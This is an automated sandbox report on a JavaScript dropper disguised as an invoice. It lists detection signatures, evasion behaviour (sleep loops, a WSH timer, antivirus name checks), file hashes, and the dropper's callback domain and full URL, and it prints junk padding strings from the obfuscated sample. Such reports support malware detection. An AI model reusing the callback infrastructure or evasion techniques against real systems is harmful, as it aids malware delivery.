Windows Analysis Report
Invoice_949287 2024_4_81859153_8337611.js

Overview

General Information

Sample name: Invoice_949287 2024_4_81859153_8337611.js
Analysis ID: 1428530
MD5: dc6731d9395eca15bbb79a88e98ad790
SHA1: cfa27b8f65a0d2e1453968d85111ce408dda4e32
SHA256: 551f30891cadc3826ea24c817d6bb95018006afc375c644a363e50074fe5c6a3
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
JavaScript file contains Antivirus product strings
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: pankerfan.com Virustotal: Detection: 9% Perma Link
Source: https://pankerfan.com/ Virustotal: Detection: 7% Perma Link
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: pankerfan.com replaycode: Server failure (2)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: pankerfan.com
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=583181
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://github.com/pmjoniak/GeometricTools/blob/master/GTEngine/Include/Mathematics/GteIntrRay3Trian
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://media.blackhat.com/us-13/US-13-Daigniere-TLS-Secrets-Slides.pdf
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/2u
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/:u
Source: wscript.exe, 00000000.00000003.2035036189.00000200A68E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdE
Source: wscript.exe, 00000000.00000003.2034236548.00000200A66C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035673999.00000200A66F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdENHf&jjcontent=mIBXU&l_cid=82
Source: wscript.exe, 00000000.00000003.2034770728.00000200A6687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A6688000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pankerfan.com:443/eft-edi-customer?Xe=wawxGFZa&Ys=ecIFw&sourceNB=qdENHf&jjcontent=mIBXU&l_ci
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/26114
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://wiki.mozilla.org/Security/Tor_Uplift/Tracking
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://www.mozilla.org/en-US/firefox/39.0/releasenotes/
Source: wscript.exe, 00000000.00000003.2033314851.00000200AAA3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018833643.00000200AAFC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026327419.00000200ABAB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018211870.00000200A954D000.00000004.00000020.00020000.00000000.sdmp, Invoice_949287 2024_4_81859153_8337611.js String found in binary or memory: https://www.ppsloan.org/publications/StupidSH36.pdf

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: Invoice_949287 2024_4_81859153_8337611.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal60.evad.winJS@1/0@1/0
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: Invoice_949287 2024_4_81859153_8337611.js Static file information: File size 5728041 > 1048576
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6432 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1976 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: Invoice_949287 2024_4_81859153_8337611.js Binary or memory string: UireBlWC += 'hkNv7vw5f';/*e assessment on the computer (e.g., 41 43 9 45 INTEGER(KIND=MPI_OFFSET_KIND) OFFSET 26 46 40 where extent(recvtype) is the type extent obtained from a call to MPI_Type_get_extent. int MPI_File_get_position(MPI_File fh, MPI_Offset -offset) of a window created with regions and countries. control variables, since performance variables have different requirements and parameters. By keeping them separate, the interface provides cleaner semantics and allows extreme events (very high confidence), and loss of livelihoods and culture (high confidence) (Figure 2.3). e-commerce, both at a domestic and international level. The TYPE(MPI_Request) :: req(4) 32 TYPE(MPI_Comm), INTENT(IN) :: comm In Germany, the national virtual machine was run on the VMware Player. As mentioned 31 . regarding the quality of these reviews with regard to the professional standards 1 after the broadcast, and process 2 sends a message to process 1 before the broadcast. - create the complex-product user-op MPI_COMBINER_RESIZED, 117, 123, 679 RELIGIONc pointer, disp_unit, and size of the memory segment belonging the lowest rank that specified conduct outreach activities, report those activities here. Note that scientific publications and the sharing 1. An MPI subroutine with a choice argument may be called with different argument 22 POLICIES AND REGULATION: Interstate kinetic conflictsdefined as direct 28 Pass 22 Informant interview _faglighedSkaerpet_tilsyn_med_videreSkaerpet_ti cognitive impairment (and decline from a previous must be completed with an end routine before it is safe to free buffers, etc. 37 precipitation, the evidence is mostly drawn from changes in indices based on one-day or five-day precipitation amounts and the root executes n receives, 25 - 17 OUT recvbuf starting address of receive buffer (choice) arguments used in the MPI_BSEND call, returns an upper bound on the amount climate-informed transboundary management, cooperation, responses and solutions through multinational or regional governance processes (high confidence). Multilateral governance efforts can help biodiversity and the financial impacts, we can expect t 22 to the data presented in the paper) either weighted Chapter 6 40 World Religion Database. 5 computer-based items via a preview function, to ensure that the stimulus, questions, and Diff erences in profi ciency levels may indicate that fi eldwork eff orts to gain late respondent participation were eff ective in reducing nonresponse bias. At the same time, they indicate that some level of nonresponse bias might still be present in the data. However, this high income countries, US$1.4 billion from middle Documentation 16 4 5.5.1 Performance of European healthcare systems process whose rank in comm is equal to root. The value of these arguments on other scores on the new Mental Health indicators. 3 Interview from our 2010 estimate of 1.01%. Excluding informal It see*/
Source: Invoice_949287 2024_4_81859153_8337611.js Binary or memory string: /*ocesses with compare the basis for prevalence estimates (WAR 2009 vs monopoly on power and control over society NORTH AFRICA 12 37 more volatile and confrontational geopolitical MPI_INFO_SET, 366, 366, 367, 369 5 have decided not to enforce any restrictions on the author of the MPI library that would 12 2 target_count, target_datatype, op, win) most likely will be accelerated by convergent 41 the VMware VIX interface soft ware. Th is soft ware provided services such as controlling virtual machines, fi le handling, and calling programs and scripts inside the virtual machine. 15 buffers can be from the beginning of a nonblocking operation until the completion INTEGER COMM_OLD, N, SOURCES(-), DEGREES(-), DESTINATIONS(-), 19 tag, newintercomm, ierror) 20 Advance Estimates of U.S. Retail and Food Services 42 If the Fortran compiler provides TYPE(C_PTR), then the following generic interface must during the fi rst six weeks of main working phase 1. Interviewers could request one of four modified by prefixing with the letter P, e.g., PMPI_Isend. The specific procedure names int MPI_Error_string(int errorcode, char -string, int -resultlen) OPE included catering to regional variations in language or diff erences in vocabulary use in different age groups. Bey*/
Source: wscript.exe, 00000000.00000003.2034679979.00000200A66AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035548707.00000200A66AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034236548.00000200A667C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;;|

HIPS / PFW / Operating System Protection Evasion
barindex
JavaScript file contains Antivirus product strings
Source: Invoice_949287 2024_4_81859153_8337611.js Initial file: avast, norton, drweb, eset, avg
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428530 Sample: Invoice_949287 2024_4_81859... Startdate: 19/04/2024 Architecture: WINDOWS Score: 60 9 pankerfan.com 2->9 11 Multi AV Scanner detection for domain / URL 2->11 13 Sigma detected: WScript or CScript Dropper 2->13 15 JavaScript file contains Antivirus product strings 2->15 6 wscript.exe 1 2->6         started        signatures3 process4 signatures5 17 Windows Scripting host queries suspicious COM object (likely to drop second stage) 6->17
No contacted IP infos

Contacted Domains

Name IP Active
pankerfan.com unknown unknown